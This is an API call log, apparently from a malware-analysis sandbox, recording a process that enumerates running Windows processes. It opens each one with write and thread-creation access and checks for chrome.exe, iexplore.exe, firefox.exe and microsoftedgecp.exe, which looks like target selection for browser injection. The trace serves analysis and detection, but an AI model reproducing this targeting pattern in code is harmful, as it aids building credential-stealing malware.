	[0211.868] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.869] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3bb8
	[0211.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.869] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.870] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.870] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.870] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.870] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.871] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3bbc
	[0211.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.871] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.871] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.872] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.872] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.872] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3bc0
	[0211.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.873] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.873] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.874] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.874] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.874] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0211.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3bc4
	[0211.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.875] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0211.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.875] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.876] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0211.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.876] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.876] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3bc8
	[0211.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.877] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.877] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.878] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.878] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.878] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0211.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3bcc
	[0211.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.879] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.879] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.879] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.882] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.883] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0211.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3bd0
	[0211.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.883] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0211.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.884] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.884] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0211.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.884] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.884] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.885] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3bd4
	[0211.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.885] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.886] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.886] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.886] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.886] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0211.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3bd8
	[0211.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.887] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0211.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.887] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.888] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0211.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.888] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.888] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0211.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3bdc
	[0211.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.889] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0211.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.889] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.890] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0211.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.890] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.890] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0211.891] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3be0
	[0211.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.891] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0211.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.891] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.891] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0211.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.892] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.892] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0211.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3be4
	[0211.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.893] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0211.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.893] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.893] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0211.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.894] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.894] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0211.894] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0211.894] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0211.895] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3be8
	[0211.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.896] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0211.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.896] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.897] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0211.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.897] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.898] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0211.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3bec
	[0211.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.898] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0211.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.899] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.899] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0211.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.899] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.899] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0211.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3bf0
	[0211.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.900] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0211.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.901] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.901] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0211.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.901] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.901] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0211.902] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3bf4
	[0211.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.902] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0211.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.903] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.903] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0211.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.903] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.903] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0211.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3bf8
	[0211.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.904] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0211.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.905] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.905] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0211.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.906] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.906] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0211.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3bfc
	[0211.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.907] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0211.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.907] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.908] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0211.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.908] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0211.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3c00
	[0211.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.909] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0211.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.909] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.910] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0211.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.910] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.910] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0211.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3c04
	[0211.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.911] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0211.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.912] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.912] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0211.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.913] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.914] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0211.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3c08
	[0211.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.915] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0211.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.915] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.915] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0211.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.915] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.916] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0211.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3c0c
	[0211.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.916] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0211.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.917] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.917] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0211.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.917] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.917] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0211.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3c10
	[0211.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.918] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0211.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.919] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.919] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0211.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.919] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.920] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0211.920] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3c14
	[0211.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.921] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0211.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.921] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.922] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0211.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.922] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.923] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0211.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3c18
